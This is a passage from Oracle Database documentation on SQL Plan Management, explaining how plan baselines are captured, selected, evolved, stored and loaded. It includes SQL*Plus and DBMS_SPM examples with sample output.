manually or automatically. See "Plan Evolution". This section contains the following topics: 23.1.1 Purpose of SQL Plan Management The primary goal of SQL plan management is to prevent performance regressions caused by plan changes. A secondary goal is to gracefully adapt to changes such as new optimizer statistics or indexes by verifying and accepting only plan changes that improve performance. Note: SQL plan baselines cannot help when an event has caused irreversible execution plan changes, such as dropping an index. 23.1.1.1 Benefits of SQL Plan Management Typical scenarios in which SQL plan management can improve or preserve SQL performance include: • A database upgrade that installs a new optimizer version usually results in plan changes for a small percentage of SQL statements. Most plan changes result in either improvement or no performance change. However, some plan changes may cause performance regressions. SQL plan baselines significantly minimize potential regressions resulting from an upgrade. When you upgrade, the database only uses plans from the plan baseline. The database puts new plans that are not in the current baseline into a holding area, and later evaluates them to determine whether they use fewer resources than the current plan in the baseline. If the plans perform better, then the database promotes them into the baseline; otherwise, the database does not promote them. • Ongoing system and data changes can affect plans for some SQL statements, potentially causing performance regressions. SQL plan baselines help minimize performance regressions and stabilize SQL performance. • Deployment of new application modules introduces new SQL statements into the database. The application software may use appropriate SQL execution plans developed in a standard test configuration for the new statements. If the system configuration is significantly different from the test configuration, then the database can evolve SQL plan baselines over time to produce better performance. See Also: Oracle Database Upgrade Guide to learn how to upgrade an Oracle database 23.1.1.2 Differences Between SQL Plan Baselines and SQL Profiles Both SQL profiles and SQL plan baselines help improve the performance of SQL statements by ensuring that the optimizer uses only optimal plans. Both profiles and baselines are internally implemented using hints (see "About Optimizer Hints"). However, these mechanisms have the following significant differences: • In general, SQL plan baselines are proactive, whereas SQL profiles are reactive. Typically, you create SQL plan baselines before significant performance problems occur. SQL plan baselines prevent the optimizer from using suboptimal plans in the future. The database creates SQL profiles when you invoke SQL Tuning Advisor, which you do typically only after a SQL statement has shown high-load symptoms. SQL profiles are primarily useful by providing the ongoing resolution of optimizer mistakes that have led to suboptimal plans. Because the SQL profile mechanism is reactive, it cannot guarantee stable performance as drastic database changes occur. The following graphic illustrates the difference: Description of tgsql_vm_028.png follows Description of the illustration tgsql_vm_028.png • SQL plan baselines reproduce a specific plan, whereas SQL profiles correct optimizer cost estimates. A SQL plan baseline is a set of accepted plans. Each plan is implemented using a set of outline hints that fully specify a particular plan. SQL profiles are also implemented using hints, but these hints do not specify any specific plan. Rather, the hints correct miscalculations in the optimizer estimates that lead to suboptimal plans. For example, a hint may correct the cardinality estimate of a table. Because a profile does not constrain the optimizer to any one plan, a SQL profile is more flexible than a SQL plan baseline. For example, changes in initialization parameters and optimizer statistics allow the optimizer to choose a better plan. Oracle recommends that you use SQL Tuning Advisor. In this way, you follow the recommendations made by the advisor for SQL profiles and plan baselines rather than trying to determine which mechanism is best for each SQL statement. 23.1.2 Plan Capture SQL plan capture refers to techniques for capturing and storing relevant information about plans in the SQL Management Base for a set of SQL statements. Capturing a plan means making SQL plan management aware of this plan. You can configure initial plan capture to occur automatically by setting an initialization parameter, or you can capture plans manually by using the DBMS_SPM package. 23.1.2.1 Automatic Initial Plan Capture You enable automatic initial plan capture by setting the initialization parameter OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES to true (the default is false). When enabled, the database automatically creates a SQL plan baseline for any repeatable SQL statement executed on the database. If automatic initial plan capture is enabled, and if the database executes a repeatable SQL statement, then the capture algorithm is as follows: • If a SQL plan baseline does not exist, then the optimizer creates a plan history and SQL plan baseline for the statement, marking the initial plan for the statement as accepted and adding it to the SQL plan baseline. • If a SQL plan baseline exists, then the optimizer behavior depends on the cost-based plan derived at parse time: • If this plan does not match a plan in the SQL plan baseline, then the optimizer marks the new plan as unaccepted and adds it to the SQL plan baseline. • If this plan does match a plan in the SQL plan baseline, then nothing is added to the SQL plan baseline. The following graphic shows the decision tree for automatic initial plan capture when OPTIMIZER_USE_SQL_PLAN_BASELINES is set to true (see "Plan Selection" for more information): Description of tgsql_vm_004.png follows Description of the illustration tgsql_vm_004.png Note: The settings of OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES and OPTIMIZER_USE_SQL_PLAN_BASELINES are independent. For example, if OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES is true, then the database creates initial plan baselines regardless of whether OPTIMIZER_USE_SQL_PLAN_BASELINES is true or false. See Also: Oracle Database Reference to learn about the OPTIMIZER_USE_SQL_PLAN_BASELINES initialization parameter 23.1.2.2 Manual Plan Capture In SQL plan management, manual plan capture refers to the user-initiated bulk load of existing plans into a SQL plan baseline. Use Cloud Control or PL/SQL to load the execution plans for SQL statements from a SQL tuning set (STS), the shared SQL area, a staging table, or a stored outline. The following graphic illustrates loading plans into a SQL plan baseline. Description of tgsql_vm_007.png follows Description of the illustration tgsql_vm_007.png The loading behavior varies depending on whether a SQL plan baseline exists for each statement represented in the bulk load: • If a baseline for the statement does not exist, then the database does the following: 1. Creates a plan history and plan baseline for the statement 2. Marks the initial plan for the statement as accepted 3. Adds the plan to the new baseline • If a baseline for the statement exists, then the database does the following: 1. Marks the loaded plan as accepted 2. Adds the plan to the plan baseline for the statement without verifying the plan's performance Manually loaded plans are always marked accepted because the optimizer assumes that any plan loaded manually by the administrator has acceptable performance. 23.1.3 Plan Selection SQL plan selection is the optimizer ability to detect plan changes based on stored plan history, and the use of SQL plan baselines to select plans to avoid potential performance regressions. When the database performs a hard parse of a SQL statement, the optimizer generates a best-cost plan. By default, the optimizer then attempts to find a matching plan in the SQL plan baseline for the statement. If no plan baseline exists, then the database runs the statement with the best-cost plan. If a plan baseline exists, then the optimizer behavior depends on whether the newly generated plan is in the plan baseline: • If the new plan is in the baseline, then the database executes the statement using the found plan. • If the new plan is not in the baseline, then the optimizer marks the newly generated plan as unaccepted and adds it to the plan history. Optimizer behavior depends on the contents of the plan baseline: • If fixed plans exist in the plan baseline, then the optimizer uses the fixed plan (see "Fixed Plans") with the lowest cost. • If no fixed plans exist in the plan baseline, then the optimizer uses the baseline plan with the lowest cost. • If no reproducible plans exist in the plan baseline, which could happen if every plan in the baseline referred to a dropped index, then the optimizer uses the newly generated cost-based plan. The following graphic shows the decision tree for SQL plan selection. Description of tgsql_vm_003.png follows Description of the illustration tgsql_vm_003.png 23.1.4 Plan Evolution In general, SQL plan evolution is the process by which the optimizer verifies new plans and adds them to an existing SQL plan baseline. Specifically, plan evolution consists of the following distinct steps: 1. Verifying that unaccepted plans perform at least as well as accepted plans in a SQL plan baseline (known as plan verification) 2. Adding unaccepted plans to the plan baseline as accepted plans after the database has proved that they perform as well as accepted plans In the standard case of plan evolution, the optimizer performs the preceding steps sequentially, so that a new plan is not usable by SQL plan management until the optimizer verifies plan performance relative to the SQL plan baseline. However, you can configure SQL plan management to perform one step without performing the other. The following graphic shows the possible paths for plan evolution: Description of tgsql_vm_023.png follows Description of the illustration tgsql_vm_023.png 23.1.4.1 Purpose of Plan Evolution Typically, a SQL plan baseline for a SQL statement starts with a single accepted plan. However, some SQL statements perform well when executed with different plans under different conditions. For example, a SQL statement with bind variables whose values result in different selectivities may have several optimal plans. Creating a materialized view or an index or repartitioning a table may make current plans more expensive than other plans. If new plans were never added to SQL plan baselines, then the performance of some SQL statements might degrade. Thus, it is sometimes necessary to evolve newly accepted plans into SQL plan baselines. Plan evolution prevents performance regressions by verifying the performance of a new plan before including it in a SQL plan baseline. 23.1.4.2 PL/SQL Procedures for Plan Evolution The DBMS_SPM package provides procedures and functions for plan evolution. These procedures use the task infrastructure. For example, CREATE_EVOLVE_TASK creates an evolution task, whereas EXECUTE_EVOLVE_TASK executes it. All task evolution procedures have the string EVOLVE_TASK in the name. Use the evolve procedures on demand, or configure the procedures to run automatically. The automatic maintenance task SYS_AUTO_SPM_EVOLVE_TASK executes daily in the scheduled maintenance window. The task perform the following actions automatically: 1. Selects and ranks unaccepted plans for verification 2. Accepts each plan if it satisfies the performance threshold 23.1.5 Storage Architecture for SQL Plan Management This section describes the SQL plan management storage architecture: 23.1.5.1 SQL Management Base The SQL management base (SMB) is a logical repository in the data dictionary that contains the following: • SQL statement log, which contains only SQL IDs • SQL plan history, which includes the SQL plan baselines • SQL profiles • SQL patches The SMB stores information that the optimizer can use to maintain or improve SQL performance. The SMB resides in the SYSAUX tablespace and uses automatic segment-space management. Because the SMB is located entirely within the SYSAUX tablespace, the database does not use SQL plan management and SQL tuning features when this tablespace is unavailable. The following graphic illustrates the SMB architecture. Description of tgsql_vm_002.png follows Description of the illustration tgsql_vm_002.png Note: Data visibility and privilege requirements may differ when using the SMB with pluggable databases. See Oracle Database Administrator's Guide for a table that summarizes how manageability features work in a container database (CDB). See Also: Oracle Database Administrator's Guide to learn about the SYSAUX tablespace 23.1.5.2 SQL Statement Log When automatic SQL plan capture is enabled, the SQL statement log contains the SQL ID of SQL statements that the optimizer has evaluated over time. The database tracks a statement when its SQL ID exists in the SQL statement log. When the database parses or executes a statement that is tracked, the database recognizes it as a repeatable SQL statement. Example 23-1 Logging SQL Statements This example illustrates how the database tracks statements in the statement log and creates baselines automatically for repeatable statements. An initial query of the statement log shows no tracked SQL statements. After a query of hr.jobs for AD_PRES, the log shows one tracked statement. SQL> ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true; System altered. SQL> SELECT * FROM SQLLOG$; no rows selected SQL> SELECT job_title FROM hr.jobs WHERE job_id = 'AD_PRES'; JOB_TITLE ----------------------------------- President SQL> SELECT * FROM SQLLOG$; SIGNATURE BATCH# ---------- ---------- 1.8096E+19 1 Now the session executes a different jobs query. The log shows two tracked statements: SQL> SELECT job_title FROM hr.jobs WHERE job_id='PR_REP'; JOB_TITLE ----------------------------------- Public Relations Representative SQL> SELECT * FROM SQLLOG$; SIGNATURE BATCH# ---------- ---------- 1.7971E+19 1 1.8096E+19 1 A query of DBA_SQL_PLAN_BASELINES shows that no baseline for either statement exists because neither statement is repeatable: SQL> SELECT SQL_HANDLE, SQL_TEXT 2 FROM DBA_SQL_PLAN_BASELINES 3 WHERE SQL_TEXT LIKE 'SELECT job_title%'; no rows selected The session executes the query for job_id='PR_REP' a second time. Because this statement is now repeatable, and because automatic SQL plan capture is enabled, the database creates a plan baseline for this statement. The query for job_id='AD_PRES' has only been executed once, so no plan baseline exists for it. SQL> SELECT job_title FROM hr.jobs WHERE job_id='PR_REP'; JOB_TITLE ----------------------------------- Public Relations Representative SQL> SELECT SQL_HANDLE, SQL_TEXT 2 FROM DBA_SQL_PLAN_BASELINES 3 WHERE SQL_TEXT LIKE 'SELECT job_title%'; SQL_HANDLE SQL_TEXT -------------------- -------------------- SQL_f9676a330f972dd5 SELECT job_title FRO M hr.jobs WHERE job_ id='PR_REP' See Also: 23.1.5.3 SQL Plan History The SQL plan history is the set of plans generated for a repeatable SQL statement over time. The history contains both SQL plan baselines and unaccepted plans. In SQL plan management, the database detects plan changes and records the new plan in the history so that the DBA can manually evolve (verify) it. Because ad hoc SQL statements do not repeat and so do not have performance degradation, the database maintains plan history only for repeatable SQL statements. Starting in Oracle Database 12c Release 1 (12.1), the SMB stores the plans rows for new plans added to the plan history of a SQL statement. The DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE function fetches and displays the plan from the SMB. For plans created before Oracle Database 12c Release 1 (12.1), the function must compile the SQL statement and generate the plan because the SMB does not store the rows. See Also: 23.1.5.3.1 Enabled Plans An enabled plan is eligible for use by the optimizer. The database automatically marks all plans in the plan history as enabled even if they are still unaccepted. You can manually change an enabled plan to a disabled plan, which means the optimizer can no longer use the plan even if it is accepted. 23.1.5.3.2 Accepted Plans A plan is accepted if and only if it is in the plan baseline. The plan history for a statement contains all plans, both accepted and unaccepted. After the optimizer generates the first accepted plan in a plan baseline, every subsequent unaccepted plan is added to the plan history, awaiting verification, but is not in the SQL plan baseline. Figure 23-1 shows plan histories for three different SQL statements. The SQL plan baseline for one statement contains two accepted plans. The plan history for this statement includes two unaccepted plans. A DBA has marked one unaccepted plan as disabled so that the optimizer cannot use it. Figure 23-1 SQL Plan Management Architecture Description of Figure 23-1 follows Description of "Figure 23-1 SQL Plan Management Architecture" 23.1.5.3.3 Fixed Plans A fixed plan is an accepted plan that is marked as preferred, so that the optimizer considers only the fixed plans in the baseline. Fixed plans influence the plan selection process of the optimizer. Assume that three plans exist in the SQL plan baseline for a statement. You want the optimizer to give preferential treatment to only two of the plans. As shown in Figure 23-2, you mark these two plans as fixed so that the optimizer uses only the best plan from these two, ignoring the other plans. If new plans are added to a baseline that contains at least one enabled fixed plan, then the optimizer cannot use the new plans until you manually declare them as fixed. 23.1.6 User Interfaces for SQL Plan Management Access the DBMS_SPM package through Cloud Control or through the command line. 23.1.6.1 SQL Plan Baseline Page in Cloud Control The SQL Plan Control page in Cloud Control is a GUI that shows information about SQL profiles, SQL patches, and SQL plan baselines. To access the SQL Plan Baseline page:  1. Access the Database Home page, as described in "Accessing the Database Home Page in Cloud Control." 2. From the Performance menu, select SQL, then SQL Plan Control. The SQL Plan Control page appears. 3. Click Files to view the SQL Plan Baseline subpage, shown in Figure 23-3. Figure 23-3 SQL Plan Baseline Subpage Description of Figure 23-3 follows Description of "Figure 23-3 SQL Plan Baseline Subpage" You can perform most SQL plan management tasks in this page or in pages accessed through this page. See Also: 23.1.6.2 DBMS_SPM Package On the command line, use the DBMS_SPM and DBMS_XPLAN PL/SQL packages to perform most SQL plan management tasks. Table 23-1 describes the most relevant DBMS_SPM procedures and functions for creating, dropping, and loading SQL plan baselines. Table 23-1 DBMS_SPM Procedures and Functions Package Procedure or Function Description DBMS_SPM CONFIGURE This procedure changes configuration options for the SMB in name/value format. DBMS_SPM CREATE_STGTAB_BASELINE This procedure creates a staging table that enables you to transport SQL plan baselines from one database to another. DBMS_SPM DROP_SQL_PLAN_BASELINE This function drops some or all plans in a plan baseline. DBMS_SPM LOAD_PLANS_FROM_CURSOR_CACHE This function loads plans in the shared SQL area (also called the cursor cache) into SQL plan baselines. DBMS_SPM LOAD_PLANS_FROM_SQLSET This function loads plans in an STS into SQL plan baselines. DBMS_SPM PACK_STGTAB_BASELINE This function packs SQL plan baselines, which means that it copies them from the SMB into a staging table. DBMS_SPM UNPACK_STGTAB_BASELINE This function unpacks SQL plan baselines, which means that it copies SQL plan baselines from a staging table into the SMB. DBMS_XPLAN DISPLAY_SQL_PLAN_BASELINE This function displays one or more execution plans for the SQL statement identified by SQL handle. "About the DBMS_SPM Evolve Functions" describes the functions related to SQL plan evolution. See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM package 23.1.7 Basic Tasks in SQL Plan Management This section explains the basic tasks in using SQL plan management to prevent plan regressions and permit the optimizer to consider new plans. The tasks are as follows: 23.2 Configuring SQL Plan Management This section contains the following topics: 23.2.1 Configuring the Capture and Use of SQL Plan Baselines You control SQL plan management with initialization parameters. The default values are as follows: • OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=false For any repeatable SQL statement that does not already exist in the plan history, the database does not automatically create an initial SQL plan baseline for the statement. See "Automatic Initial Plan Capture". • OPTIMIZER_USE_SQL_PLAN_BASELINES=true For any SQL statement that has an existing SQL plan baseline, the database automatically adds new plans to the SQL plan baseline as nonaccepted plans. See "Plan Selection". Note: The settings of the preceding parameters are independent of each other. For example, if OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES is true, then the database creates initial plan baselines for new statements even if OPTIMIZER_USE_SQL_PLAN_BASELINES is false. If the default behavior is what you intend, then skip this section. The following sections explain how to change the default parameter settings from the command line. If you use Cloud Control, then set these parameters in the SQL Plan Baseline subpage (shown in Figure 23-3). 23.2.1.1 Enabling Automatic Initial Plan Capture for SQL Plan Management Setting the OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES initialization parameter to true is all that is necessary for the database to automatically create an initial SQL plan baseline for any SQL statement not already in the plan history. This parameter does not control the automatic addition of newly discovered plans to a previously created SQL plan baseline. Caution: When automatic baseline capture is enabled, the database creates a SQL plan baseline for every repeatable statement, including all recursive SQL and monitoring SQL. Thus, automatic capture may result in the creation of an extremely large number of plan baselines. To enable automatic initial plan capture for SQL plan management:  1. Connect SQL*Plus to the database with the appropriate privileges, and then show the current settings for SQL plan management. For example, connect SQL*Plus to the database with administrator privileges and execute the following command (sample output included): SQL> SHOW PARAMETER SQL_PLAN NAME TYPE VALUE ------------------------------------ ----------- ------------------------------ optimizer_capture_sql_plan_baselines boolean FALSE optimizer_use_sql_plan_baselines boolean TRUE If the parameters are set as you intend, then skip the remaining steps. 2. To enable the automatic recognition of repeatable SQL statements and the generation of SQL plan baselines for these statements, enter the following statement: SQL> ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true; 23.2.1.2 Disabling All SQL Plan Baselines When you set the OPTIMIZER_USE_SQL_PLAN_BASELINES initialization parameter to false, the database does not use any plan baselines in the database. Typically, you might want to disable one or two plan baselines, but not all of them. A possible use case might be testing the benefits of SQL plan management. To disable all SQL plan baselines in the database:  1. Connect SQL*Plus to the database with the appropriate privileges, and then show the current settings for SQL plan management. For example, connect SQL*Plus to the database with administrator privileges and execute the following command (sample output included): SQL> SHOW PARAMETER SQL_PLAN NAME TYPE VALUE ------------------------------------ ----------- ------------------------------ optimizer_capture_sql_plan_baselines boolean FALSE optimizer_use_sql_plan_baselines boolean TRUE If the parameters are set as you intend, then skip the remaining steps. 2. To ignore all existing plan baselines enter the following statement: SQL> ALTER SYSTEM SET OPTIMIZER_USE_SQL_PLAN_BASELINES=false; See Also: Oracle Database Reference to learn about the SQL plan baseline initialization parameters 23.2.2 Managing the SPM Evolve Advisor Task SPM Evolve Advisor is a SQL advisor that evolves plans that have recently been added to the SQL plan baseline. The advisor simplifies plan evolution by eliminating the requirement to do it manually. By default, SYS_AUTO_SPM_EVOLVE_TASK runs daily in the scheduled maintenance window. The SPM Evolve Advisor task ranks all unaccepted plans, and then performs test executions of as many plans as possible during the window. The evolve task selects the lowest-cost plan to compare against each unaccepted plan. If a plan performs sufficiently better than the existing accepted plan, then the database automatically accepts it. The task can accept more than one plan. 23.2.2.1 Enabling and Disabling the SPM Evolve Advisor Task No separate scheduler client exists for the Automatic SPM Evolve Advisor task. One client controls both Automatic SQL Tuning Advisor and Automatic SPM Evolve Advisor. Thus, the same task enables or disables both. See "Enabling and Disabling the Automatic SQL Tuning Task" to learn how to enable and disable Automatic SPM Evolve Advisor. 23.2.2.2 Configuring the Automatic SPM Evolve Advisor Task The DBMS_SPM package enables you to configure automatic plan evolution by specifying the task parameters using the SET_EVOLVE_TASK_PARAMETER procedure. Because the task is owned by SYS, only SYS can set task parameters. The ACCEPT_PLANS tuning task parameter specifies whether to accept recommended plans automatically. When ACCEPT_PLANS is true (default), SQL plan management automatically accepts all plans recommended by the task. When set to false, the task verifies the plans and generates a report if its findings, but does not evolve the plans. Assumptions The tutorial in this section assumes the following: • You do not want the database to evolve plans automatically. • You want the task to time out after 1200 seconds per execution. To set automatic evolution task parameters:  1. Connect SQL*Plus to the database with the appropriate privileges, and then optionally query the current task settings. For example, connect SQL*Plus to the database with administrator privileges and execute the following query: COL PARAMETER_NAME FORMAT a25 COL VALUE FORMAT a10 SELECT PARAMETER_NAME, PARAMETER_VALUE AS "VALUE" FROM DBA_ADVISOR_PARAMETERS WHERE ( (TASK_NAME = 'SYS_AUTO_SPM_EVOLVE_TASK') AND ( (PARAMETER_NAME = 'ACCEPT_PLANS') OR (PARAMETER_NAME = 'TIME_LIMIT') ) ); Sample output appears as follows: PARAMETER_NAME VALUE ------------------------- ---------- ACCEPT_PLANS TRUE TIME_LIMIT 3600 2. Set parameters using PL/SQL code of the following form: BEGIN DBMS_SPM.SET_EVOLVE_TASK_PARAMETER( task_name => 'SYS_AUTO_SPM_EVOLVE_TASK', parameter => parameter_name, value => value); END; / For example, the following PL/SQL block sets a time limit to 20 minutes, and also automatically accepts plans: BEGIN DBMS_SPM.SET_EVOLVE_TASK_PARAMETER('SYS_AUTO_SPM_EVOLVE_TASK', 'LOCAL_TIME_LIMIT', 1200); DBMS_SPM.SET_EVOLVE_TASK_PARAMETER('SYS_AUTO_SPM_EVOLVE_TASK', 'ACCEPT_PLANS', 'false'); END; / See Also: Oracle Database PL/SQL Packages and Types Reference for complete reference information for DBMS_SPM 23.3 Displaying Plans in a SQL Plan Baseline To view the plans stored in the SQL plan baseline for a specific statement, use the DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE function. This function uses plan information stored in the plan history to display the plans. Table 23-2 describes some function parameters. Table 23-2 DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE Parameters Function Parameter Description sql_handle SQL handle of the statement. Retrieve the SQL handle by joining the V$SQL.SQL_PLAN_BASELINE and DBA_SQL_PLAN_BASELINES views on the PLAN_NAME columns. plan_name Name of the plan for the statement. This section explains how to show plans in a baseline from the command line. If you use Cloud Control, then display plan baselines from the SQL Plan Baseline subpage shown in Figure 23-3. To display SQL plans:  1. Connect SQL*Plus to the database with the appropriate privileges, and then obtain the SQL ID of the query whose plan you want to display. For example, assume that a SQL plan baseline exists for a SELECT statement with the SQL ID 31d96zzzpcys9. 2. Query the plan by SQL ID. The following query displays execution plans for the statement with the SQL ID 31d96zzzpcys9: SELECT PLAN_TABLE_OUTPUT FROM V$SQL s, DBA_SQL_PLAN_BASELINES b, TABLE( DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE(b.sql_handle,b.plan_name,'basic') ) t WHERE s.EXACT_MATCHING_SIGNATURE=b.SIGNATURE AND b.PLAN_NAME=s.SQL_PLAN_BASELINE AND s.SQL_ID='31d96zzzpcys9'; The sample query results are as follows: PLAN_TABLE_OUTPUT ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- SQL handle: SQL_513f7f8a91177b1a SQL text: select * from hr.employees where employee_id=100 ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- Plan name: SQL_PLAN_52gvzja8jfysuc0e983c6 Plan id: 3236529094 Enabled: YES Fixed: NO Accepted: YES Origin: AUTO-CAPTURE ------------------------------------------------------------------------------- Plan hash value: 3236529094 ----------------------------------------------------- | Id | Operation | Name | ----------------------------------------------------- | 0 | SELECT STATEMENT | | | 1 | TABLE ACCESS BY INDEX ROWID| EMPLOYEES | | 2 | INDEX UNIQUE SCAN | EMP_EMP_ID_PK | ----------------------------------------------------- The results show that the plan for SQL ID 31d96zzzpcys is named SQL_PLAN_52gvzja8jfysuc0e983c6 and was captured automatically. See Also: 23.4 Loading SQL Plan Baselines You can initiate the user-initiated bulk load of a set of existing plans into a SQL plan baseline. The goal of this task is to load plans from the following sources: • SQL tuning set (STS) Capture the plans for a SQL workload into an STS, and then load the plans into the SQL plan baselines. The optimizer uses the plans the next time that the database executes the SQL statements. Bulk loading execution plans from an STS is an effective way to prevent plan regressions after a database upgrade. Note: You can load plans from Automatic Workload Repository snapshots into an STS, and then load plans from the STS into the SQL plan baseline. • Shared SQL area Load plans for statements directly from the shared SQL area, which is in the shared pool of the SGA. By applying a filter on the module name, the schema, or the SQL ID you identify the SQL statement or set of SQL statements to capture. The optimizer uses the plans the next time that the database executes the SQL statements. Loading plans directly from the shared SQL area is useful when application SQL has been hand-tuned using hints. Because you probably cannot change the SQL to include the hint, populating the SQL plan baseline ensures that the application SQL uses optimal plans. • Staging table Use the DBMS_SPM package to define a staging table, DBMS_SPM.PACK_STGTAB_BASELINE to copy the baselines into a staging table, and Oracle Data Pump to transfer the table to another database. On the destination database, use DBMS_SPM.UNPACK_STGTAB_BASELINE to unpack the plans from the staging table and put the baselines into the SMB. A use case is the introduction of new SQL statements into the database from a new application module. A vendor can ship application software with SQL plan baselines for the new SQL. In this way, the new SQL uses plans that are known to give optimal performance under a standard test configuration. Alternatively, if you develop or test an application in-house, export the correct plans from the test database and import them into the production database. • Stored outline Migrate stored outlines to SQL plan baselines. After the migration, you maintain the same plan stability that you had using stored outlines while being able to use the more advanced features provided by SQL Plan Management, such as plan evolution. See "Migrating Stored Outlines to SQL Plan Baselines". See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.PACK_STGTAB_BASELINE Function 23.4.1 Loading Plans from a SQL Tuning Set A SQL tuning set is a database object that includes one or more SQL statements, execution statistics, and execution context. This section explains how to load plans from an STS. Load plans with the DBMS_SPM.LOAD_PLANS_FROM_SQLSET function or using Cloud Control. Table 23-3 describes some function parameters. Table 23-3 LOAD_PLANS_FROM_SQLSET Parameters Function Parameter Description sqlset_name Name of the STS from which the plans are loaded into SQL plan baselines. basic_filter A filter applied to the STS to select only qualifying plans to be loaded. The filter can take the form of any WHERE clause predicate that can be specified against the view DBA_SQLSET_STATEMENTS. fixed Default NO means the loaded plans are used as nonfixed plans. YES means the loaded plans are fixed plans. "Plan Selection" explains that the optimizer chooses a fixed plan in the plan baseline over a nonfixed plan. This section explains how to load plans from the command line. In Cloud Control, go to the SQL Plan Baseline subpage (shown in Figure 23-3) and click Load to load plan baselines from SQL tuning sets. Assumptions This tutorial assumes the following: • You want the loaded plans to be nonfixed. • You have executed the following query: SELECT /*LOAD_STS*/ * FROM sh.sales WHERE quantity_sold > 40 ORDER BY prod_id; • You have loaded the plan from the shared SQL area into the SQL tuning set named SPM_STS, which is owned by user SPM. To load plans from a SQL tuning set:  1. Connect SQL*Plus to the database with the appropriate privileges, and then verify which plans are in the SQL tuning set. For example, query DBA_SQLSET_STATEMENTS for the STS name (sample output included): SELECT SQL_TEXT FROM DBA_SQLSET_STATEMENTS WHERE SQLSET_NAME = 'SPM_STS'; SQL_TEXT -------------------- SELECT /*LOAD_STS*/ * FROM sh.sales WHERE quantity_sold > 40 ORDER BY prod_id The output shows that the plan for the select /*LOAD_STS*/ statement is in the STS. 2. Load the plan from the STS into the SQL plan baseline. For example, in SQL*Plus execute the function as follows: VARIABLE cnt NUMBER EXECUTE :cnt := DBMS_SPM.LOAD_PLANS_FROM_SQLSET( - sqlset_name => 'SPM_STS', - basic_filter => 'sql_text like ''SELECT /*LOAD_STS*/%''' ); The basic_filter parameter specifies a WHERE clause that loads only the plans for the queries of interest. The variable cnt stores the number of plans loaded from the STS. 3. Query the data dictionary to ensure that the plan was loaded into the baseline for the statement. Example 23-2 executes the following query (sample output included). Example 23-2 DBA_SQL_PLAN_BASELINES SQL> SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, 2 ORIGIN, ENABLED, ACCEPTED 3 FROM DBA_SQL_PLAN_BASELINES; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC ------------------------ -------------------- ------------------------------ -------------- --- --- SQL_a8632bd857a4a25e SELECT /*LOAD_STS*/ SQL_PLAN_ahstbv1bu98ky1694fc6b MANUAL-LOAD YES YES * FROM sh.sales WHERE quantity_sold > 40 ORDER BY prod_id The output shows that the plan is accepted, which means that it is in the plan baseline. Also, the origin is MANUAL-LOAD, which means that the plan was loaded by an end user rather than automatically captured. 4. Optionally, drop the STS. For example, execute DBMS_SQLTUNE.DROP_SQLSET to drop the SPM_STS tuning set as follows: EXEC SYS.DBMS_SQLTUNE.DROP_SQLSET( sqlset_name => 'SPM_STS', - sqlset_owner => 'SPM' ); See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.LOAD_PLANS_FROM_SQLSET function 23.4.2 Loading Plans from the Shared SQL Area This section explains how to load plans from the shared SQL area using PL/SQL. Load plans with the LOAD_PLANS_FROM_CURSOR_CACHE function of the DBMS_SPM package. Table 23-4 describes some function parameters. Table 23-4 LOAD_PLANS_FROM_CURSOR_CACHE Parameters Function Parameter Description sql_id SQL statement identifier. Identifies a SQL statement in the shared SQL area. fixed Default NO means the loaded plans are used as nonfixed plans. YES means the loaded plans are fixed plans (see "Fixed Plans"). "Plan Selection" explains that the optimizer chooses a fixed plan in the plan baseline over a nonfixed plan. This section explains how to load plans using the command line. In Cloud Control, go to the SQL Plan Baseline subpage (shown in Figure 23-3) and click Load to load plan baselines from the shared SQL area. Assumptions This tutorial assumes the following: • You have executed the following query: SELECT /*LOAD_CC*/ * FROM sh.sales WHERE quantity_sold > 40 ORDER BY prod_id; • You want the loaded plans to be nonfixed. To load plans from the shared SQL area:  1. Connect SQL*Plus to the database with the appropriate privileges, and then determine the SQL IDs of the relevant statements in the shared SQL area. For example, query V$SQL for the SQL ID of the sh.sales query (sample output included): SELECT SQL_ID, CHILD_NUMBER AS "Child Num", PLAN_HASH_VALUE AS "Plan Hash", OPTIMIZER_ENV_HASH_VALUE AS "Opt Env Hash" FROM V$SQL WHERE SQL_TEXT LIKE 'SELECT /*LOAD_CC*/%'; SQL_ID Child Num Plan Hash Opt Env Hash ------------- ---------- ---------- ------------ 27m0sdw9snw59 0 1421641795 3160571937 The preceding output shows that the SQL ID of the statement is 27m0sdw9snw59. 2. Load the plans for the specified statements into the SQL plan baseline. For example, execute the LOAD_PLANS_FROM_CURSOR_CACHE function in SQL*Plus to load the plan for the statement with the SQL ID 27m0sdw9snw59: VARIABLE cnt NUMBER EXECUTE :cnt := DBMS_SPM.LOAD_PLANS_FROM_CURSOR_CACHE( - sql_id => '27m0sdw9snw59'); In the preceding example, the variable cnt contains the number of plans that were loaded. 3. Query the data dictionary to ensure that the plans were loaded into the baseline for the statement. Example 23-3 queries DBA_SQL_PLAN_BASELINES (sample output included). Example 23-3 DBA_SQL_PLAN_BASELINES SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED FROM DBA_SQL_PLAN_BASELINES; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC ------------------------ -------------------- ------------------------------ -------------- --- --- SQL_a8632bd857a4a25e SELECT /*LOAD_CC*/ SQL_PLAN_gdkvzfhrgkda71694fc6b MANUAL-LOAD YES YES * FROM sh.sales WHERE quantity_sold > 40 ORDER BY prod_id The output shows that the plan is accepted, which means that it is in the plan baseline for the statement. Also, the origin is MANUAL-LOAD, which means that the statement was loaded by an end user rather than automatically captured. See Also: Oracle Database PL/SQL Packages and Types Reference to 